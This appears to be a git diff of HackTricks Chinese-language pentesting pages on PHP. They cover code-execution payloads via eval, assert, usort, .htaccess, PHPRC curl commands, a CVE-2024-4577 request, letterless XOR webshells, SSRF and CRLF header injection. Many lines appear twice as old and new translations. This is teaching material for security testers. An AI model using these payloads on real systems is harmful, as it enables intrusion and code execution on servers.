实际上,在正则表达式术语中,我们并没有执行 100,000 次“递归”,而是在计算“回溯步骤”,正如[PHP 文档](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit)所述,默认情况下 `pcre.backtrack_limit` 变量为 1,000,0001M。\
要达到这个目标,`'X'*500_001` 将导致 100 万次回溯步骤50 万次向前和 50 万次向后):
好吧,在正则表达式术语中,我们实际上并没有进行 100k 次“递归”,而是计算“回溯步骤”,正如 [PHP 文档](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) 所述,它在 `pcre.backtrack_limit` 变量中默认为 1\_000\_0001M。\
要达到这个`'X'*500_001` 将导致 100 万个回溯步骤50万向前和50万向后):
```python
payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"
```
### 用于 PHP 混淆的类型转换
### PHP混淆的类型混合
```php
$obfs = "1"; //string "1"
$obfs++; //int 2
@ -141,9 +146,9 @@ $obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7
```
## 在重定向后执行EAR
## Execute After Redirect (EAR)
如果 PHP 正在重定向到另一个页面,但在设置头部 `Location` 后没有调用 **`die`** 或 **`exit`** 函数PHP 将继续执行并将数据附加到主体
如果 PHP 正在重定向到另一个页面,但在设置头部 `Location` 后没有调用 **`die`** 或 **`exit`** 函数PHP 将继续执行并将数据附加到主体:
```php
<?php
// In this page the page will be read and the content appended to the body of
@ -153,9 +158,9 @@ header('Location: /index.php?page=default.html');
readfile($page);
?>
```
## 路径遍历和文件包含利用
## 路径遍历和文件包含漏洞利用
检查:
检查
{% content-ref url="../../../pentesting-web/file-inclusion/" %}
[file-inclusion](../../../pentesting-web/file-inclusion/)
@ -163,15 +168,16 @@ readfile($page);
## 更多技巧
* **register\_globals**: 在 **PHP < 4.1.1.1** 或者配置错误的情况下,**register\_globals** 可能会被激活(或者它们的行为被模仿)。这意味着在全局变量中,比如 $\_GET 如果它们有一个值,比如 $\_GET\["param"]="1234",你可以通过 **$param 访问它。因此,通过发送 HTTP 参数,你可以覆盖在代码中使用的变量**。
* **PHPSESSION cookies of the same domain are stored in the same place**,因此如果在一个域中**不同路径中使用不同的 cookies**,你可以使一个路径**访问另一个路径的 cookie**,设置另一个路径 cookie 的值。这样,如果**两个路径访问具有相同名称的变量**,你可以使**路径1 中该变量的值应用于路径2**。然后路径2将视路径1的变量为有效通过给 cookie 赋予在路径2中对应的名称
* 当你有机器用户的**用户名**时,请检查地址: **/\~\<USERNAME>** 看看是否激活了 php 目录。
* [**使用 php wrappers 进行 LFI 和 RCE**](../../../pentesting-web/file-inclusion/)
* **register\_globals**: 在 **PHP < 4.1.1.1** 或者如果配置错误,**register\_globals** 可能是激活的(或者其行为被模拟)。这意味着在全局变量如 $\_GET 中,如果它们有值,例如 $\_GET\["param"]="1234",你可以通过 **$param 访问它。因此,通过发送 HTTP 参数,你可以覆盖** 在代码中使用的变量。
* **同一域的 PHPSESSION cookies 存储在同一位置**,因此如果在一个域中 **不同路径使用不同的 cookies**,你可以使该路径 **访问该路径的 cookie**,设置其他路径 cookie 的值。\
这样,如果 **两个路径访问同名变量**,你可以使 **路径1中的该变量的值应用于路径2**。然后路径2将视路径1的变量为有效通过给 cookie 赋予在路径2中对应的名称
* 当你拥有机器用户的 **用户名** 时。检查地址:**/\~\<USERNAME>** 以查看 php 目录是否被激活。
* [**使用 php 包装器的 LFI 和 RCE**](../../../pentesting-web/file-inclusion/)
### password\_hash/password\_verify
这些函数通常用于 PHP 中**从密码生成哈希**,以及**检查**密码是否与哈希匹配。\
支持的算法有:`PASSWORD_DEFAULT` 和 `PASSWORD_BCRYPT`(以 `$2y$` 开头)。请注意,**PASSWORD\_DEFAULT 经常与 PASSWORD\_BCRYPT 相同**。目前,**PASSWORD\_BCRYPT** 在输入上有一个**大小限制为 72 字节**。因此,当你尝试使用此算法对大于 72 字节的内容进行哈希时,只有前 72 字节会被使用
这些函数通常在 PHP 中用于 **从密码生成哈希****检查** 密码是否与哈希相符。\
支持的算法有:`PASSWORD_DEFAULT` 和 `PASSWORD_BCRYPT`(以 `$2y$` 开头)。请注意,**PASSWORD\_DEFAULT 通常与 PASSWORD\_BCRYPT 相同。** 目前,**PASSWORD\_BCRYPT** 对输入有 **72字节的大小限制**。因此,当你尝试用此算法对大于 72 字节的内容进行哈希时,仅会使用前 72B
```php
$cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
False
@ -179,13 +185,13 @@ False
$cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
True
```
### 绕过 HTTP 头部滥用 PHP 错误
### HTTP headers bypass abusing PHP errors
#### 在设置头部后引发错误
#### Causing error after setting headers
[**这个推特帖子**](https://twitter.com/pilvar222/status/1784618120902005070?t=xYn7KdyIvnNOlkVaGbgL6A\&s=19)中可以看到,发送超过 1000 个 GET 参数或 1000 个 POST 参数或 20 个文件PHOP 不会在响应中设置头部。
[**这个推特线程**](https://twitter.com/pilvar222/status/1784618120902005070?t=xYn7KdyIvnNOlkVaGbgL6A\&s=19) 你可以看到,发送超过 1000 个 GET 参数或 1000 个 POST 参数或 20 个文件PHOP 不会在响应中设置头部。
允许绕过例如在代码中设置 CSP 头部的情况
允许绕过例如在代码中设置 CSP 头部:
```php
<?php
header("Content-Security-Policy: default-src 'none';");
@ -193,14 +199,14 @@ if (isset($_GET["xss"])) echo $_GET["xss"];
```
#### 在设置头部之前填充主体
如果一个 **PHP 页面正在打印错误并回显用户提供的一些输入**,用户可以使 PHP 服务器打印回一些**足够长的内容**,这样当它尝试**将头部添加到响应中**时,服务器将抛出错误。\
在以下场景中,**攻击者让服务器抛出一些大错误**,正如您在屏幕上看到的,当 PHP 尝试**修改头部信息时,它无法**(例如 CSP 头部未发送给用户):
如果一个 **PHP 页面正在打印错误并回显用户提供的一些输入**,用户可以使 PHP 服务器打印出一些 **足够长的内容**,以便在尝试 **将头部添加** 到响应时,服务器会抛出错误。\
在以下场景中,**攻击者使服务器抛出了一些大的错误**,正如您在屏幕上看到的,当 PHP 尝试 **修改头部信息时,它无法**(例如 CSP 头部没有发送给用户):
![](<../../../.gitbook/assets/image (1085).png>)
## PHP 函数中的 SSRF
查页面:
页面:
{% content-ref url="php-ssrf.md" %}
[php-ssrf.md](php-ssrf.md)
@ -214,15 +220,15 @@ if (isset($_GET["xss"])) echo $_GET["xss"];
[查看更多有用的 PHP 函数](php-useful-functions-disable\_functions-open\_basedir-bypass/)
### **通过 preg\_replace() 实现 RCE**
### **通过** **preg\_replace()** **进行 RCE**
```php
preg_replace(pattern,replace,base)
preg_replace("/a/e","phpinfo()","whatever")
```
执行“replace”参数中的代码,至少需要一个匹配项。\
这个preg\_replace选项在PHP 5.5.0版本之后已经**被弃用**。
在“replace”参数中执行代码,至少需要一个匹配项。\
此preg\_replace选项在PHP 5.5.0中已被**弃用**。
### **通过Eval()实现RCE**
### **通过Eval()进行RCE**
```
'.system('uname -a'); $dummy='
'.system('uname -a');#
@ -230,17 +236,23 @@ preg_replace("/a/e","phpinfo()","whatever")
'.phpinfo().'
<?php phpinfo(); ?>
```
### **通过 Assert() 实现远程代码执行RCE**
### **通过 Assert() 实现 RCE**
这个 php 中的函数允许您**执行以字符串形式编写的代码**,以便**返回 true 或 false**(并根据此修改执行)。通常用户变量将被插入到字符串的中间。例如:\
`assert("strpos($_GET['page']),'..') === false")` --> 在这种情况下,要获得**RCE**,您可以执行
此函数在 php 中允许您 **执行以字符串编写的代码****返回 true 或 false**(并根据此改变执行)。通常用户变量会插入在字符串中间。例如:\
`assert("strpos($_GET['page']),'..') === false")` --> 在这种情况下,要获得 **RCE**,您可以这样做
```
?page=a','NeVeR') === false and system('ls') and strpos('a
```
### 通过 usort() 实现远程代码执行RCE
您需要**破坏**代码**语法****添加**您的**有效载荷**,然后**再次修复**它。您可以使用**逻辑运算**,例如“**and**”或“%26%26”或“|”。请注意“or”和“||”不起作用,因为如果第一个条件为真,我们的有效载荷将不会被执行。同样,“;”也不起作用,因为我们的有效载荷不会被执行。
这个函数用于使用特定函数对项目数组进行排序。\
要滥用这个函数:
**另一个选项**是将命令的执行添加到字符串中:`'.highlight_file('.passwd').'`
**另一个选项**(如果您有内部代码)是修改某个变量以改变执行:`$file = "hola"`
### **通过 usort() 进行 RCE**
此函数用于使用特定函数对项目数组进行排序。\
要滥用此函数:
```php
<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#
@ -260,44 +272,44 @@ function foo($x,$y){
usort();}phpinfo;#, "cmp");
}?>
```
### 使用 **//** 进行代码注释
您还可以使用 **//** 注释其余代码
要发现需要关闭的括号数量:
要发现需要关闭的括号数量:
- `?order=id;}//`:我们收到一个错误消息(`Parse error: syntax error, unexpected ';'`)。我们可能缺少一个或多个括号。
- `?order=id);}//`:我们收到一个**警告**。这看起来差不多正确
- `?order=id));}//`:我们收到一个错误消息(`Parse error: syntax error, unexpected ')' i`)。我们可能有太多的闭合括号。
* `?order=id;}//`:我们收到一条错误消息(`Parse error: syntax error, unexpected ';'`)。我们可能缺少一个或多个括号。
* `?order=id);}//`:我们收到一个 **警告**。这似乎是正确的
* `?order=id));}//`:我们收到一条错误消息(`Parse error: syntax error, unexpected ')' i`)。我们可能有太多的闭合括号。
### 通过 .httaccess 实现 RCE
### **通过 .httaccess 进行 RCE**
如果你可以**上传**一个 **.htaccess** 文件,那么你可以**配置**几个东西,甚至执行代码(配置扩展名为 .htaccess 的文件可以**执行**)。
如果您可以 **上传** 一个 **.htaccess**,那么您可以 **配置** 多个内容,甚至执行代码(配置具有 .htaccess 扩展名的文件可以被 **执行**)。
可以在[这里](https://github.com/wireghoul/htshells)找到不同的 .htaccess shells
不同的 .htaccess shell 可以在 [这里](https://github.com/wireghoul/htshells) 找到。
### 通过环境变量实现 RCE
### 通过环境变量进行 RCE
如果你发现一个允许你**修改 PHP 环境变量**的漏洞(以及另一个允许上传文件的漏洞,尽管通过更多研究可能可以绕过),你可以滥用这种行为来获得**RCE**
如果您发现一个漏洞,允许您 **修改 PHP 中的环境变量**(还有另一个上传文件的漏洞,尽管经过更多研究可能可以绕过),您可以利用这种行为获得 **RCE**
- [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path)这个环境变量允许你在执行其他二进制文件时加载任意库(尽管在这种情况下可能不起作用)。
- **`PHPRC`**:指示 PHP **查找其配置文件**的位置,通常称为 `php.ini`。如果你可以上传自己的配置文件,那么使用 `PHPRC` 来指向 PHP。添加一个**`auto_prepend_file`**条目,指定第二个上传的文件。这第二个文件包含正常的**PHP代码然后由 PHP 运行时执行**,在任何其他代码之前
* [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path)此环境变量允许您在执行其他二进制文件时加载任意库(尽管在这种情况下可能不起作用)。
* **`PHPRC`**:指示 PHP **在哪里查找其配置文件**,通常称为 `php.ini`。如果您可以上传自己的配置文件,则使用 `PHPRC` 指向它。添加一个 **`auto_prepend_file`** 条目,指定第二个上传的文件。这个第二个文件包含正常的 **PHP 代码,然后由 PHP 运行时在任何其他代码之前执行**
1. 上传一个包含我们的 shellcode 的 PHP 文件
2. 上传第二个文件,包含一个**`auto_prepend_file`**指令,指示 PHP 预处理器执行我们在步骤 1 中上传的文件
2. 上传第二个文件,包含 **`auto_prepend_file`** 指令,指示 PHP 预处理器执行我们在步骤 1 中上传的文件
3. 将 `PHPRC` 变量设置为我们在步骤 2 中上传的文件。
- 获取有关如何执行此链的更多信息[**来自原始报告**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/)。
- **PHPRC** - 另一个选项
- 如果你**无法上传文件**,你可以在 FreeBSD 中使用文件 `/dev/fd/0`,其中包含**`stdin`**,即发送到 `stdin` 的请求的**主体**
- `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
- 或者要获得 RCE启用**`allow_url_include`**并在一个文件中添加**base64 PHP代码**
- `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
- 技术[**来自此报告**](https://vulncheck.com/blog/juniper-cve-2023-36845)。
* 获取更多关于如何执行此链的信息 [**来自原始报告**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/)。
* **PHPRC** - 另一个选项
* 如果您 **无法上传文件**,您可以在 FreeBSD 中使用 "file" `/dev/fd/0`,它包含 **`stdin`**,即发送到 `stdin` 的请求 **主体**
* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
* 或者要获得 RCE启用 **`allow_url_include`** 并预先添加一个包含 **base64 PHP 代码** 的文件
* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
* 技术 [**来自此报告**](https://vulncheck.com/blog/juniper-cve-2023-36845)。
### XAMPP CGI RCE - CVE-2024-4577
Web 服务器解析 HTTP 请求并将其传递给执行请求的 PHP 脚本,例如 [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar\&ref=labs.watchtowr.com) 作为 `php.exe cgi.php foo=bar`,这允许参数注入。这将允许注入以下参数以从主体加载 PHP 代码:
Web 服务器解析 HTTP 请求并将其传递给执行请求的 PHP 脚本,例如 [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar\&ref=labs.watchtowr.com)作为 `php.exe cgi.php foo=bar`,这允许参数注入。这将允许注入以下参数以从主体加载 PHP 代码:
```jsx
-d allow_url_include=1 -d auto_prepend_file=php://input
```
此外,由于 PHP 后期的规范化,可以使用 0xAD 字符注入“-”参数。查看[**此帖子**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/)中的漏洞利用示例:
此外,由于 PHP 后来的规范化,可以使用 0xAD 字符注入 "-" 参数。检查来自 [**这篇文章**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/) 的漏洞示例:
```jsx
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
@ -312,27 +324,27 @@ phpinfo();
?>
```
## PHP静态分析
## PHP 静态分析
查看是否可以在对这些函数的调用中插入代码(来自[这里](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be):
查看是否可以在对这些函数的调用中插入代码(来自 [这里](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):
```php
exec, shell_exec, system, passthru, eval, popen
unserialize, include, file_put_cotents
$_COOKIE | if #This mea
```
如果您正在调试PHP应用程序可以在`/etc/php5/apache2/php.ini`中添加`display_errors = On`来全局启用错误打印并重新启动apache`sudo systemctl restart apache2`
如果您正在调试一个 PHP 应用程序,可以在 `/etc/php5/apache2/php.ini` 中全局启用错误打印,添加 `display_errors = On` 并重启 apache `sudo systemctl restart apache2`
### 解混淆PHP代码
### 解混淆 PHP 代码
您可以使用**网站**[**www.unphp.net**](http://www.unphp.net)**来解混淆PHP代码。**
您可以使用 **web**[ **www.unphp.net**](http://www.unphp.net) **来解混淆 php 代码。**
## PHP包装器和协议
## PHP 包装器和协议
PHP包装器和协议可以让您**绕过系统中的写入和读取保护**,并对其进行破坏。有关[**更多信息,请查看此页面**](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols)。
PHP 包装器和协议可能允许您 **绕过系统中的读写保护** 并危害系统。有关 [**更多信息,请查看此页面**](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols)。
## Xdebug未经身份验证的RCE
## Xdebug 未经身份验证的 RCE
如果您发现`phpconfig()`输出中启用了**Xdebug**,则应尝试通过[https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)获取RCE
如果您`phpconfig()` 输出中看到 **Xdebug****启用**,您应该尝试通过 [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) 获取 RCE。
## 变量变量
```php
@ -346,15 +358,15 @@ echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums
```
## 利用新的 $\_GET\["a"]\($\_GET\["b"])
## RCE 利用新的 $\_GET\["a"]\($\_GET\["b"])
如果在一个页面中你可以**创建一个任意类的新对象**你可能能够获得RCE请查看以下页面了解详情
如果在一个页面中你可以 **创建一个任意类的新对象**,你可能能够获得 RCE查看以下页面以了解如何
{% content-ref url="php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md" %}
[php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md](php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md)
{% endcontent-ref %}
## 在不使用字母的情况下执行PHP
## 无字母执行 PHP
[https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/](https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/)
@ -369,25 +381,25 @@ $__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3
$___=$__; #Could be not needed inside eval
$_($___); #If ¢___ not needed then $_($__), show_source(.passwd)
```
### XOR 简易 shell 代码
### XOR easy shell code
根据[**这篇解析**](https://mgp25.com/ctf/Web-challenge/),可以通过以下方式生成一个简单的 shellcode
根据[**这篇文章**](https://mgp25.com/ctf/Web-challenge/),可以通过以下方式生成一个简单的 shellcode
```php
$_="`{{{"^"?<>/"; // $_ = '_GET';
${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);
```
所以,如果你可以**执行任意PHP代码而不使用数字和字母**你可以发送一个请求滥用该有效负载来执行任意PHP代码
所以,如果你可以**在没有数字和字母的情况下执行任意 PHP**,你可以发送如下请求,利用该有效载荷执行任意 PHP
```
POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded
comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);
```
要获取更详细的解释,请查看[https://ctf-wiki.org/web/php/php/#preg\_match](https://ctf-wiki.org/web/php/php/#preg\_match)
对于更深入的解释,请查看 [https://ctf-wiki.org/web/php/php/#preg\_match](https://ctf-wiki.org/web/php/php/#preg\_match)
### XOR Shellcode在eval内部
### XOR Shellcode (inside eval)
```bash
#!/bin/bash
@ -407,7 +419,7 @@ lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='
```php
lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"
```
### Perl 类似
### 类似Perl
```php
<?php
$_=[];
@ -449,16 +461,17 @@ $___($_[_]); // ASSERT($_POST[_]);
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

64
network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
View file

@ -1,18 +1,19 @@
# PHP SSRF
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -22,9 +23,9 @@
***
### SSRF PHP函数
### SSRF PHP 函数
一些函数,如**file\_get\_contents()fopen()file()md5\_file()**接受URL作为输入如果用户可以控制数据则会产生**可能的SSRF漏洞**
一些函数**file\_get\_contents(), fopen(), file(), md5\_file()** 接受 URL 作为输入,如果用户可以控制数据,将会导致 **可能的 SSRF 漏洞**
```php
file_get_contents("http://127.0.0.1:8081");
fopen("http://127.0.0.1:8081", "r");
@ -33,21 +34,21 @@ md5_file("http://127.0.0.1:8081");
```
### Wordpress SSRF via DNS Rebinding
正如[**这篇博文中解释的**](https://patchstack.com/articles/exploring-the-unpatched-wordpress-ssrf),即使是 Wordpress 函数 **`wp_safe_remote_get`** 也容易受到 DNS 重绑定的影响,从而可能容易受到 SSRF 攻击的威胁。它调用的主要验证函数是 **wp\_http\_validate\_url**,该函数检查协议是否为 `http://``https://`,端口是否为 **80**、**443** 和 **8080**,但它**容易受到 DNS 重绑定**的影响
正如[**这篇博中解释的**](https://patchstack.com/articles/exploring-the-unpatched-wordpress-ssrf),即使是Wordpress函数**`wp_safe_remote_get`**也容易受到DNS重绑定的攻击从而可能容易受到SSRF攻击。它调用的主要验证是**wp\_http\_validate\_ur**l该函数检查协议是否为`http://`或`https://`,并且端口是否为**80**、**443**和**8080**之一,但它**容易受到DNS重绑定的攻击**
根据该博文,其他存在漏洞的函数包括:
根据该文章,其他易受攻击的函数包括:
- `wp_safe_remote_request()`
- `wp_safe_remote_post()`
- `wp_safe_remote_head()`
- `WP_REST_URL_Details_Controller::get_remote_url()`
- `download_url()`
- `wp_remote_fopen()`
- `WP_oEmbed::discover()`
* `wp_safe_remote_request()`
* `wp_safe_remote_post()`
* `wp_safe_remote_head()`
* `WP_REST_URL_Details_Controller::get_remote_url()`
* `download_url()`
* `wp_remote_fopen()`
* `WP_oEmbed::discover()`
### CRLF
此外,在某些情况下,甚至可以通过前函数中的 CRLF “漏洞”发送任意头:
此外,在某些情况下,可能甚至可以通过前函数中的CRLF“漏洞”发送任意头
```php
# The following will create a header called from with value Hi and
# an extra header "Injected: I HAVE IT"
@ -63,10 +64,10 @@ Connection: close
# Any of the previously mentioned functions will send those headers
```
{% hint style="warning" %}
要了解有关CRLF漏洞的更多信息请查看此漏洞[https://bugs.php.net/bug.php?id=81680\&edit=1](https://bugs.php.net/bug.php?id=81680\&edit=1)
有关该 CRLF 漏洞的更多信息,请查看此错误 [https://bugs.php.net/bug.php?id=81680\&edit=1](https://bugs.php.net/bug.php?id=81680\&edit=1)
{% endhint %}
请注意,这些函数可能有其他方法在请求中设置任意头,例如:
请注意,这些函数可能有其他方法在请求中设置任意头,例如:
```php
$url = "";
@ -82,22 +83,23 @@ $options = array(
$context = stream_context_create($options);
$file = file_get_contents($url, false, $context);
```
**尝试困难安全团队**
**努力安全组**
<figure><img src="../../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为英雄使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord团队**](https://discord.gg/hRep4RUj7f) 或 [**telegram团队**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

222
network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
View file

@ -1,30 +1,31 @@
# PHP - 有用的函数 & disable\_functions/open\_basedir绕过
# PHP - 有用的函数与 disable\_functions/open\_basedir 绕过
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
